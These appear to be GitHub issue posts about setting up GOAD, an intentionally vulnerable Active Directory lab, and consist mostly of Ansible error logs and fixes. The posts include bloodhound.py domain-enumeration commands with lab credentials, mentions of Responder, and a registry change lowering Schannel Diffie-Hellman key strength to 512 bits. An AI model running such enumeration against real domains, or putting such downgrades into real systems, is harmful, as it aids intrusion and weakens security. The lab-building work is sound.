bloodhound.py --zip -c All -d sevenkingdoms.local -u [email protected] -p iseedeadpeople -dc kingslanding.sevenkingdoms.local
bloodhound.py --zip -c All -d essos.local -u [email protected] -p iseedeadpeople -dc meereen.essos.local
My guess is that LDAP connection fails for whatever reason. But why would it work for the first command?
Edit :
I've done a lot of troubleshooting and everything with Ldap3 works fine.
The Windows ingestor used (directly on the machines) works fine as well.
So my guess is the BloodHound Linux ingestor (bloodhound.py) struggles with some things related to Vagrant + VirtualBox...
Still following your guide, I noticed that I didn't get any connection on Responder (even when I attempt coerced authentications).
Before the question comes, I put the right interface name and IP 👍
Are there any troubleshooting steps I should take to find out what the problem is here?
Fix: I had a firewall activated that was blocking incoming connections for Responder. I'm still troubleshooting for BloodHound but with no success for now.
Thank you in advance!
It would probably be a good enhancement to add Velociraptor to elk.yml.
I'm working on getting GOAD to launch on the Windows host by using Vagrant within WSL. The process is working up to the WinRM connection. Vagrant is trying to connect to 127.0.0.1 but I need it to use the Windows host address instead. Where do I change that? It's not jumping out at me in the Vagrantfile.
For one host I am getting unreachable,
<192.168.56.22> ESTABLISH WINRM CONNECTION FOR USER: vagrant on PORT 5986 TO 192.168.56.22
fatal: [192.168.56.22]: UNREACHABLE! => {
"changed": false,
"msg": "ssl: HTTPSConnectionPool(host='192.168.56.22', port=5986): Max retries exceeded with url: /wsman (Caused by ConnectTimeoutError(<urllib3.connection.HTTPSConnection object at 0x10bfd7820>, 'Connection to 192.168.56.22 timed out. (connect timeout=500)'))",
"unreachable": true
}
Are there any instructional videos on how to build this? I have a laptop with 1TB SSH and 32 GB mem. It is running Ubuntu Desktop 22.04. Do I install Vbox and then another Ubuntu VM and then follow the instructions? How much RAM and storage do I give the VM? Can I run Vbox on Windows with an Ubuntu VM?
Thanks
FIX For MAC users:
Run 'export OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES' before 'ansible-playbook main.yml'
I am stuck at this,
fatal: [192.168.56.22]: FAILED! => {
"changed": true,
"msg": "failed to join domain: Computer 'castelblack' failed to join domain 'north.sevenkingdoms.local' from its current workgroup 'WORKGROUP' with following error message: The specified network name is no longer available.",
"reboot_required": false
}
Has anyone seen this before?
Setup: Windows 10 machine (host), with VirtualBox installed
- VirtualBox with Ubuntu 22 guest trying to clone and set up the project
- error after running "vagrant up"
After a lot of troubleshooting: I disabled Hyper-V on my Windows host and enabled nested virtualization in VirtualBox.
I also have VMware and I read somewhere it might not play nice with the resources with VirtualBox.
Any ideas?
TASK [password_policy : set password policy] *****************************************************************************
fatal: [192.168.56.11]: FAILED! => {"changed": true, "debug": [], "error": [{"category_info": {"activity": "Set-ADDefaultDomainPasswordPolicy", "category": "ResourceUnavailable", "category_id": 21, "reason": "ADServerDownException", "target_name": "WORKGROUP", "target_type": "ADDefaultDomainPasswordPolicy"}, "error_details": null, "exception": {"help_link": null, "hresult": -2146233088, "inner_exception": {"help_link": null, "hresult": -2146233088, "inner_exception": null, "message": "Unable to find a default server with flags: 'Writable | ADWS | ReturnDnsName'.", "source": null, "type": "Microsoft.ActiveDirectory.Management.ADException"}, "message": "Unable to find a default server with Active Directory Web Services running.", "source": "Microsoft.ActiveDirectory.Management", "type": "Microsoft.ActiveDirectory.Management.ADServerDownException"}, "fully_qualified_error_id": "ActiveDirectoryServer:1355,Microsoft.ActiveDirectory.Management.Commands.SetADDefaultDomainPasswordPolicy", "output": "Set-ADDefaultDomainPasswordPolicy : Unable to find a default server with Active Directory Web Services running.\r\nAt line:19 char:1\r\n+ Set-ADDefaultDomainPasswordPolicy -Identity $Domain -AuthType Negotia ...\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : ResourceUnavailable: (WORKGROUP:ADDefaultDomainPasswordPolicy) \r\n[Set-ADDefaultDomainPasswordPolicy], ADServerDownException\r\n + FullyQualifiedErrorId : \r\nActiveDirectoryServer:1355,Microsoft.ActiveDirectory.Management.Commands.SetADDefaultDomainPasswordPolicy\r\n \r\n", "pipeline_iteration_info": [0, 1], "script_stack_trace": "at , : line 19", "target_object": {"AddedProperties": [], "ComplexityEnabled": null, "LockoutDuration": null, "LockoutObservationWindow": null, "LockoutThreshold": null, "MaxPasswordAge": null, "MinPasswordAge": null, "MinPasswordLength": null, "ModifiedProperties": [], "PasswordHistoryCount": null, "PropertyCount": 0, "PropertyNames": [], 
"RemovedProperties": [], "ReversibleEncryptionEnabled": null}}], "host_err": "", "host_out": "", "information": [], "output": [], "result": {}, "verbose": [], "warning": []}
PLAY RECAP ***************************************************************************************************************
192.168.56.11 : ok=27 changed=6 unreachable=0 failed=1 skipped=3 rescued=0 ignored=0
Hi Mayfly277, thank you for the great lab. I got this issue when running task "Add trusts between domain"
I had rerun mail.yml and ad-trusts.yml many times but the issues still exist.
Hi, what is the license of this project? Can I fork it to modify it and add a Terraform deployment?
Having issues with this specific Ansible Task-
'''An exception occurred during task execution. To see the full traceback, use -vvv. The error was: at Microsoft.ActiveDirectory.Management.Commands.ADCmdletBase`1.BeginProcessing()
failed: [192.168.56.11] (item={'key': 'AcrossTheSea', 'value': ['essos.local\daenerys.targaryen']}) => {"ansible_loop_var": "item", "attempts": 3, "changed": false, "item": {"key": "AcrossTheSea", "value": ["essos.local\daenerys.targaryen"]}, "msg": "Unhandled exception while executing module: The server has rejected the client credentials."}
An exception occurred during task execution. To see the full traceback, use -vvv. The error was: at Microsoft.ActiveDirectory.Management.Commands.ADCmdletBase`1.BeginProcessing()
failed: [192.168.56.12] (item={'key': 'DragonsFriends', 'value': ['north.sevenkingdoms.local\jon.snow', 'sevenkingdoms.local\tyron.lannister', 'essos.local\daenerys.targaryen']}) => {"ansible_loop_var": "item", "attempts": 3, "changed": false, "item": {"key": "DragonsFriends", "value": ["north.sevenkingdoms.local\jon.snow", "sevenkingdoms.local\tyron.lannister", "essos.local\daenerys.targaryen"]}, "msg": "Unhandled exception while executing module: The server has rejected the client credentials."}'
An exception occurred during task execution. To see the full traceback, use -vvv. The error was: at Microsoft.ActiveDirectory.Management.Commands.ADCmdletBase`1.BeginProcessing()
failed: [192.168.56.12] (item={'key': 'Spys', 'value': ['sevenkingdoms.local\Small Council']}) => {"ansible_loop_var": "item", "attempts": 3, "changed": false, "item": {"key": "Spys", "value": ["sevenkingdoms.local\Small Council"]}, "msg": "Unhandled exception while executing module: Either the target name is incorrect or the server has rejected the client credentials."}
''
Some troubleshooting :
Domain Trust Verification And ADUC error showing issue Adding "Small [email protected]" to "[email protected]" Similar issue with the other Security groups tagged with "multi domain"
nslookup to sevenkingdoms.local from essos.local (dc03 192.168.56.12)
nslookup to essos.local from sevenkingdoms.local (dc01 192.168.56.10)
I was consistently getting this error:
TASK [groups_domains : Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}}] **************************************************************************************************
changed: [192.168.56.11] => (item={'key': 'AcrossTheSea', 'value': ['essos.local\\daenerys.targaryen']})
FAILED - RETRYING: [192.168.56.10]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (3 retries left).
changed: [192.168.56.12] => (item={'key': 'DragonsFriends', 'value': ['sevenkingdoms.local\\tyron.lannister', 'essos.local\\daenerys.targaryen']})
ok: [192.168.56.12] => (item={'key': 'Spys', 'value': ['sevenkingdoms.local\\Small Council']})
FAILED - RETRYING: [192.168.56.10]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (2 retries left).
FAILED - RETRYING: [192.168.56.10]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (1 retries left).
An exception occurred during task execution. To see the full traceback, use -vvv. The error was: at Microsoft.ActiveDirectory.Management.Commands.ADCmdletBase`1.BeginProcessing()
failed: [192.168.56.10] (item={'key': 'AcrossTheNarrowSea', 'value': ['essos.local\\daenerys.targaryen']}) => {"ansible_loop_var": "item", "attempts": 3, "changed": false, "item": {"key": "AcrossTheNarrowSea", "value": ["essos.local\\daenerys.targaryen"]}, "msg": "Unhandled exception while executing module: A call to SSPI failed, see inner exception."}
An advanced google search led me to this URL:
stackoverflow link
I opted for the reg key mod and added the following between the "synchroizes all domains" and the "Add a domain user/group from another Domain...." tasks in the file "ansible/roles/groups_domains/tasks/main.yml":
- name: "Allow downgrade of TLS"
  ansible.windows.win_regedit:
    path: HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\KeyExchangeAlgorithms\Diffie-Hellman
    name: ClientMinKeyBitLength
    data: 00000200
    type: dword
And now it's working. I can drop this in a pull request if desired...
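A narrower variant of the registry workaround in the post above, as an added example (not the poster's or the GOAD project's code): it writes the Diffie-Hellman minimum as an explicit hex value and removes the override again once the cross-domain group task has run, so the hosts do not keep accepting 512-bit DH keys for the life of the lab. The task names and the block/always wrapper are assumptions; the registry path, value name and file location are the ones given in the post.

```yaml
# Added example, not GOAD's own code. Assumed location:
# ansible/roles/groups_domains/tasks/main.yml, around the existing
# cross-domain group task. Task names below are hypothetical.
- name: "Cross-domain group membership with a temporary Schannel DH override"
  block:
    - name: "Lower the Schannel client DH minimum for this task only"
      ansible.windows.win_regedit:
        path: HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\KeyExchangeAlgorithms\Diffie-Hellman
        name: ClientMinKeyBitLength
        # 0x200 = 512 bits. Written as hex on purpose: a zero-padded
        # 00000200 is read by YAML 1.1 parsers as octal, i.e. 128.
        data: 0x00000200
        type: dword
        state: present

    # The role's existing "Add a domain user/group from another Domain ..."
    # task goes here, unchanged.

  always:
    # Runs whether the tasks in the block succeed or fail, so the weak
    # minimum is never left behind by an aborted playbook run.
    - name: "Remove the override so Schannel returns to its default minimum"
      ansible.windows.win_regedit:
        path: HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\KeyExchangeAlgorithms\Diffie-Hellman
        name: ClientMinKeyBitLength
        state: absent
```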
Is this meant to be started from a certain user on a certain box? Or do you domain join your own box to start? Or just start on the same subnet and attack from the outside of AD?
sudo docker run -ti --rm --network host -h goadansible -v $(pwd):/goad -w /goad/ansible goadansible ansible-playbook main.yml
PLAY [build all] **************************************************************************************************************************************
TASK [Gathering Facts] ********************************************************************************************************************************
ok: [192.168.56.23]
ok: [192.168.56.12]
ok: [192.168.56.10]
ok: [192.168.56.11]
ok: [192.168.56.22]
TASK [common : Upgrade module PowerShellGet to fix accept license issue on last windows ansible version] **********************************************
fatal: [192.168.56.12]: FAILED! => {"changed": true, "cmd": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInstall-PackageProvider -Name NuGet -Force\nInstall-Module PowerShellGet -Force", "delta": "0:00:02.529639", "end": "2022-11-04 16:39:26.660434", "msg": "non-zero return code", "rc": 1, "start": "2022-11-04 16:39:24.130795", "stderr": "Install-PackageProvider : No match was found for the specified search criteria for the provider 'NuGet'. The package \r\nprovider requires 'PackageManagement' and 'Provider' tags. Please check if the specified package has the tags.\r\nAt line:2 char:1\r\n+ Install-PackageProvider -Name NuGet -Force\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : InvalidArgument: (Microsoft.Power...PackageProvider:InstallPackageProvider) [Install-Pac \r\n kageProvider], Exception\r\n + FullyQualifiedErrorId : NoMatchFoundForProvider,Microsoft.PowerShell.PackageManagement.Cmdlets.InstallPackagePro \r\n vider\r\n \r\nException calling "ShouldContinue" with "2" argument(s): "Windows PowerShell is in NonInteractive mode. Read and \r\nPrompt functionality is not available."\r\nAt C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1:7392 char:8\r\n+ if($Force -or $psCmdlet.ShouldContinue($shouldContinueQueryMessag ...\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : NotSpecified: (:) [], MethodInvocationException\r\n + FullyQualifiedErrorId : PSInvalidOperationException\r\n \r\nInstall-Module : NuGet provider is required to interact with NuGet-based repositories. 
Please ensure that '2.8.5.201' \r\nor newer version of NuGet provider is installed.\r\nAt line:3 char:1\r\n+ Install-Module PowerShellGet -Force\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : InvalidOperation: (:) [Install-Module], InvalidOperationException\r\n + FullyQualifiedErrorId : CouldNotInstallNuGetProvider,Install-Module", "stderr_lines": ["Install-PackageProvider : No match was found for the specified search criteria for the provider 'NuGet'. The package ", "provider requires 'PackageManagement' and 'Provider' tags. Please check if the specified package has the tags.", "At line:2 char:1", "+ Install-PackageProvider -Name NuGet -Force", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : InvalidArgument: (Microsoft.Power...PackageProvider:InstallPackageProvider) [Install-Pac ", " kageProvider], Exception", " + FullyQualifiedErrorId : NoMatchFoundForProvider,Microsoft.PowerShell.PackageManagement.Cmdlets.InstallPackagePro ", " vider", " ", "Exception calling "ShouldContinue" with "2" argument(s): "Windows PowerShell is in NonInteractive mode. Read and ", "Prompt functionality is not available."", "At C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1:7392 char:8", "+ if($Force -or $psCmdlet.ShouldContinue($shouldContinueQueryMessag ...", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : NotSpecified: (:) [], MethodInvocationException", " + FullyQualifiedErrorId : PSInvalidOperationException", " ", "Install-Module : NuGet provider is required to interact with NuGet-based repositories. Please ensure that '2.8.5.201' ", "or newer version of NuGet provider is installed.", "At line:3 char:1", "+ Install-Module PowerShellGet -Force", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : InvalidOperation: (:) [Install-Module], InvalidOperationException", " + FullyQualifiedErrorId : CouldNotInstallNuGetProvider,Install-Module"], "stdout": "", "stdout_lines": []}
fatal: [192.168.56.23]: FAILED! => {"changed": true, "cmd": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInstall-PackageProvider -Name NuGet -Force\nInstall-Module PowerShellGet -Force", "delta": "0:00:02.577486", "end": "2022-11-04 16:39:26.711897", "msg": "non-zero return code", "rc": 1, "start": "2022-11-04 16:39:24.134410", "stderr": "Install-PackageProvider : No match was found for the specified search criteria for the provider 'NuGet'. The package \r\nprovider requires 'PackageManagement' and 'Provider' tags. Please check if the specified package has the tags.\r\nAt line:2 char:1\r\n+ Install-PackageProvider -Name NuGet -Force\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : InvalidArgument: (Microsoft.Power...PackageProvider:InstallPackageProvider) [Install-Pac \r\n kageProvider], Exception\r\n + FullyQualifiedErrorId : NoMatchFoundForProvider,Microsoft.PowerShell.PackageManagement.Cmdlets.InstallPackagePro \r\n vider\r\n \r\nException calling "ShouldContinue" with "2" argument(s): "Windows PowerShell is in NonInteractive mode. Read and \r\nPrompt functionality is not available."\r\nAt C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1:7392 char:8\r\n+ if($Force -or $psCmdlet.ShouldContinue($shouldContinueQueryMessag ...\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : NotSpecified: (:) [], MethodInvocationException\r\n + FullyQualifiedErrorId : PSInvalidOperationException\r\n \r\nInstall-Module : NuGet provider is required to interact with NuGet-based repositories. 
Please ensure that '2.8.5.201' \r\nor newer version of NuGet provider is installed.\r\nAt line:3 char:1\r\n+ Install-Module PowerShellGet -Force\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : InvalidOperation: (:) [Install-Module], InvalidOperationException\r\n + FullyQualifiedErrorId : CouldNotInstallNuGetProvider,Install-Module", "stderr_lines": ["Install-PackageProvider : No match was found for the specified search criteria for the provider 'NuGet'. The package ", "provider requires 'PackageManagement' and 'Provider' tags. Please check if the specified package has the tags.", "At line:2 char:1", "+ Install-PackageProvider -Name NuGet -Force", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : InvalidArgument: (Microsoft.Power...PackageProvider:InstallPackageProvider) [Install-Pac ", " kageProvider], Exception", " + FullyQualifiedErrorId : NoMatchFoundForProvider,Microsoft.PowerShell.PackageManagement.Cmdlets.InstallPackagePro ", " vider", " ", "Exception calling "ShouldContinue" with "2" argument(s): "Windows PowerShell is in NonInteractive mode. Read and ", "Prompt functionality is not available."", "At C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1:7392 char:8", "+ if($Force -or $psCmdlet.ShouldContinue($shouldContinueQueryMessag ...", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : NotSpecified: (:) [], MethodInvocationException", " + FullyQualifiedErrorId : PSInvalidOperationException", " ", "Install-Module : NuGet provider is required to interact with NuGet-based repositories. Please ensure that '2.8.5.201' ", "or newer version of NuGet provider is installed.", "At line:3 char:1", "+ Install-Module PowerShellGet -Force", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : InvalidOperation: (:) [Install-Module], InvalidOperationException", " + FullyQualifiedErrorId : CouldNotInstallNuGetProvider,Install-Module"], "stdout": "", "stdout_lines": []}
fatal: [192.168.56.10]: FAILED! => {"changed": true, "cmd": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInstall-PackageProvider -Name NuGet -Force\nInstall-Module PowerShellGet -Force", "delta": "0:00:13.594279", "end": "2022-11-04 16:39:37.952821", "msg": "non-zero return code", "rc": 1, "start": "2022-11-04 16:39:24.358541", "stderr": "Install-PackageProvider : No match was found for the specified search criteria for the provider 'NuGet'. The package \r\nprovider requires 'PackageManagement' and 'Provider' tags. Please check if the specified package has the tags.\r\nAt line:2 char:1\r\n+ Install-PackageProvider -Name NuGet -Force\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : InvalidArgument: (Microsoft.Power...PackageProvider:InstallPackageProvider) [Install-Pac \r\n kageProvider], Exception\r\n + FullyQualifiedErrorId : NoMatchFoundForProvider,Microsoft.PowerShell.PackageManagement.Cmdlets.InstallPackagePro \r\n vider\r\n \r\nException calling "ShouldContinue" with "2" argument(s): "Windows PowerShell is in NonInteractive mode. Read and \r\nPrompt functionality is not available."\r\nAt C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1:7455 char:8\r\n+ if($Force -or $psCmdlet.ShouldContinue($shouldContinueQueryMessag ...\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : NotSpecified: (:) [], MethodInvocationException\r\n + FullyQualifiedErrorId : PSInvalidOperationException\r\n \r\nInstall-Module : NuGet provider is required to interact with NuGet-based repositories. 
Please ensure that '2.8.5.201' \r\nor newer version of NuGet provider is installed.\r\nAt line:3 char:1\r\n+ Install-Module PowerShellGet -Force\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : InvalidOperation: (:) [Install-Module], InvalidOperationException\r\n + FullyQualifiedErrorId : CouldNotInstallNuGetProvider,Install-Module", "stderr_lines": ["Install-PackageProvider : No match was found for the specified search criteria for the provider 'NuGet'. The package ", "provider requires 'PackageManagement' and 'Provider' tags. Please check if the specified package has the tags.", "At line:2 char:1", "+ Install-PackageProvider -Name NuGet -Force", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : InvalidArgument: (Microsoft.Power...PackageProvider:InstallPackageProvider) [Install-Pac ", " kageProvider], Exception", " + FullyQualifiedErrorId : NoMatchFoundForProvider,Microsoft.PowerShell.PackageManagement.Cmdlets.InstallPackagePro ", " vider", " ", "Exception calling "ShouldContinue" with "2" argument(s): "Windows PowerShell is in NonInteractive mode. Read and ", "Prompt functionality is not available."", "At C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1:7455 char:8", "+ if($Force -or $psCmdlet.ShouldContinue($shouldContinueQueryMessag ...", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : NotSpecified: (:) [], MethodInvocationException", " + FullyQualifiedErrorId : PSInvalidOperationException", " ", "Install-Module : NuGet provider is required to interact with NuGet-based repositories. Please ensure that '2.8.5.201' ", "or newer version of NuGet provider is installed.", "At line:3 char:1", "+ Install-Module PowerShellGet -Force", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : InvalidOperation: (:) [Install-Module], InvalidOperationException", " + FullyQualifiedErrorId : CouldNotInstallNuGetProvider,Install-Module"], "stdout": "", "stdout_lines": []}
fatal: [192.168.56.11]: FAILED! => {"changed": true, "cmd": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInstall-PackageProvider -Name NuGet -Force\nInstall-Module PowerShellGet -Force", "delta": "0:00:13.530956", "end": "2022-11-04 16:39:37.955485", "msg": "non-zero return code", "rc": 1, "start": "2022-11-04 16:39:24.424529", "stderr": "Install-PackageProvider : No match was found for the specified search criteria for the provider 'NuGet'. The package \r\nprovider requires 'PackageManagement' and 'Provider' tags. Please check if the specified package has the tags.\r\nAt line:2 char:1\r\n+ Install-PackageProvider -Name NuGet -Force\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : InvalidArgument: (Microsoft.Power...PackageProvider:InstallPackageProvider) [Install-Pac \r\n kageProvider], Exception\r\n + FullyQualifiedErrorId : NoMatchFoundForProvider,Microsoft.PowerShell.PackageManagement.Cmdlets.InstallPackagePro \r\n vider\r\n \r\nException calling "ShouldContinue" with "2" argument(s): "Windows PowerShell is in NonInteractive mode. Read and \r\nPrompt functionality is not available."\r\nAt C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1:7455 char:8\r\n+ if($Force -or $psCmdlet.ShouldContinue($shouldContinueQueryMessag ...\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : NotSpecified: (:) [], MethodInvocationException\r\n + FullyQualifiedErrorId : PSInvalidOperationException\r\n \r\nInstall-Module : NuGet provider is required to interact with NuGet-based repositories. 
Please ensure that '2.8.5.201' \r\nor newer version of NuGet provider is installed.\r\nAt line:3 char:1\r\n+ Install-Module PowerShellGet -Force\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : InvalidOperation: (:) [Install-Module], InvalidOperationException\r\n + FullyQualifiedErrorId : CouldNotInstallNuGetProvider,Install-Module", "stderr_lines": ["Install-PackageProvider : No match was found for the specified search criteria for the provider 'NuGet'. The package ", "provider requires 'PackageManagement' and 'Provider' tags. Please check if the specified package has the tags.", "At line:2 char:1", "+ Install-PackageProvider -Name NuGet -Force", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : InvalidArgument: (Microsoft.Power...PackageProvider:InstallPackageProvider) [Install-Pac ", " kageProvider], Exception", " + FullyQualifiedErrorId : NoMatchFoundForProvider,Microsoft.PowerShell.PackageManagement.Cmdlets.InstallPackagePro ", " vider", " ", "Exception calling "ShouldContinue" with "2" argument(s): "Windows PowerShell is in NonInteractive mode. Read and ", "Prompt functionality is not available."", "At C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1:7455 char:8", "+ if($Force -or $psCmdlet.ShouldContinue($shouldContinueQueryMessag ...", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : NotSpecified: (:) [], MethodInvocationException", " + FullyQualifiedErrorId : PSInvalidOperationException", " ", "Install-Module : NuGet provider is required to interact with NuGet-based repositories. Please ensure that '2.8.5.201' ", "or newer version of NuGet provider is installed.", "At line:3 char:1", "+ Install-Module PowerShellGet -Force", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : InvalidOperation: (:) [Install-Module], InvalidOperationException", " + FullyQualifiedErrorId : CouldNotInstallNuGetProvider,Install-Module"], "stdout": "", "stdout_lines": []}
fatal: [192.168.56.22]: FAILED! => {"changed": true, "cmd": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInstall-PackageProvider -Name NuGet -Force\nInstall-Module PowerShellGet -Force", "delta": "0:00:13.531467", "end": "2022-11-04 16:39:37.993241", "msg": "non-zero return code", "rc": 1, "start": "2022-11-04 16:39:24.461774", "stderr": "Install-PackageProvider : No match was found for the specified search criteria for the provider 'NuGet'. The package \r\nprovider requires 'PackageManagement' and 'Provider' tags. Please check if the specified package has the tags.\r\nAt line:2 char:1\r\n+ Install-PackageProvider -Name NuGet -Force\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : InvalidArgument: (Microsoft.Power...PackageProvider:InstallPackageProvider) [Install-Pac \r\n kageProvider], Exception\r\n + FullyQualifiedErrorId : NoMatchFoundForProvider,Microsoft.PowerShell.PackageManagement.Cmdlets.InstallPackagePro \r\n vider\r\n \r\nException calling "ShouldContinue" with "2" argument(s): "Windows PowerShell is in NonInteractive mode. Read and \r\nPrompt functionality is not available."\r\nAt C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1:7455 char:8\r\n+ if($Force -or $psCmdlet.ShouldContinue($shouldContinueQueryMessag ...\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : NotSpecified: (:) [], MethodInvocationException\r\n + FullyQualifiedErrorId : PSInvalidOperationException\r\n \r\nInstall-Module : NuGet provider is required to interact with NuGet-based repositories. 
Please ensure that '2.8.5.201' \r\nor newer version of NuGet provider is installed.\r\nAt line:3 char:1\r\n+ Install-Module PowerShellGet -Force\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : InvalidOperation: (:) [Install-Module], InvalidOperationException\r\n + FullyQualifiedErrorId : CouldNotInstallNuGetProvider,Install-Module", "stderr_lines": ["Install-PackageProvider : No match was found for the specified search criteria for the provider 'NuGet'. The package ", "provider requires 'PackageManagement' and 'Provider' tags. Please check if the specified package has the tags.", "At line:2 char:1", "+ Install-PackageProvider -Name NuGet -Force", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : InvalidArgument: (Microsoft.Power...PackageProvider:InstallPackageProvider) [Install-Pac ", " kageProvider], Exception", " + FullyQualifiedErrorId : NoMatchFoundForProvider,Microsoft.PowerShell.PackageManagement.Cmdlets.InstallPackagePro ", " vider", " ", "Exception calling "ShouldContinue" with "2" argument(s): "Windows PowerShell is in NonInteractive mode. Read and ", "Prompt functionality is not available."", "At C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1:7455 char:8", "+ if($Force -or $psCmdlet.ShouldContinue($shouldContinueQueryMessag ...", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : NotSpecified: (:) [], MethodInvocationException", " + FullyQualifiedErrorId : PSInvalidOperationException", " ", "Install-Module : NuGet provider is required to interact with NuGet-based repositories. Please ensure that '2.8.5.201' ", "or newer version of NuGet provider is installed.", "At line:3 char:1", "+ Install-Module PowerShellGet -Force", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : InvalidOperation: (:) [Install-Module], InvalidOperationException", " + FullyQualifiedErrorId : CouldNotInstallNuGetProvider,Install-Module"], "stdout": "", "stdout_lines": []}
PLAY RECAP ********************************************************************************************************************************************
192.168.56.10 : ok=1 changed=0 unreachable=0 failed=1 skipped=2 rescued=0 ignored=0
192.168.56.11 : ok=1 changed=0 unreachable=0 failed=1 skipped=2 rescued=0 ignored=0
192.168.56.12 : ok=1 changed=0 unreachable=0 failed=1 skipped=2 rescued=0 ignored=0
192.168.56.22 : ok=1 changed=0 unreachable=0 failed=1 skipped=2 rescued=0 ignored=0
192.168.56.23 : ok=1 changed=0 unreachable=0 failed=1 skipped=2 rescued=0 ignored=0
when running 'vagrant halt' after a successful launch, I get the following:
==> SRV03: Attempting graceful shutdown of VM...
==> SRV02: Attempting graceful shutdown of VM...
==> DC03: Attempting graceful shutdown of VM...
Traceback (most recent call last):
79: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/bin/vagrant:248:in `<main>'
78: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/environment.rb:301:in `cli'
77: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/cli.rb:67:in `execute'
